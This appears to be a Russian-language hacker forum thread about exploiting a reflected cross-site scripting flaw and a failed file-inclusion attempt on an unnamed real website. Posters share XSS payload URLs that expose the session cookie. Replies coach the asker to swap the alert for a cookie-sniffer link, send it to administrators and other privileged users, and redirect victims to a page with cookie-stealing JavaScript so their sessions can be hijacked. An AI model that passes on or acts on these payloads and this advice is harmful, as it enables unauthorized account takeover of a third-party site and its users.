Есть сайт, работает xss Если написать вот так: http://[САЙТ]/?node=view/666"><script>alert(document.domain)</script> То, как видно из скрипта - вылетает табличка с название сайта. Работет и такое, например.... http://[САЙТ]/?node=tralala Соответственно имеем такое: Warning: main(pages/tralala.php): failed to open stream: No such file or directory in /srv/www/htdocs/web1891/html/includes/LowerCenter.php on line 5 Code: Warning: main(): Failed opening 'pages/tralala.php' for inclusion (include_path='.:/usr/share/php') in /srv/www/htdocs/web1891/html/includes/LowerCenter.php on line 5 И так далее... Скажите, пожалуйста, что делать дальше?
ну с http://[САЙТ]/?node=view/666"><script>alert(document.domain)</script> это только менять алерт на ссылу со сниффером и пробовать подсовывать админам и т.п. вообщем прилигированным пользователям, и то если там используются куки для авторизации а с http://[САЙТ]/?node=tralala у тебя ничего не выйдет т.к. ты не сможешь выдти за пределы папки pages
Спасибо, ребята но с шеллом ничего не вышло... dim_ok Если сдеать вот так: http://[САЙТ]/?node=></td></tr></form></table><script>alert(document.cookie);</script> То мне вылетает такое сообщение PHPSESSID=76a45e1a35900e78ddfb180e83a6b379;_c=y Это что-то дает? Или находу генерирует?
Делай редирект на страницу и засовывай туда Java script код чтобы угонять куки посмотреть его можно на главной странице античате где идёт надрись"описание снифера".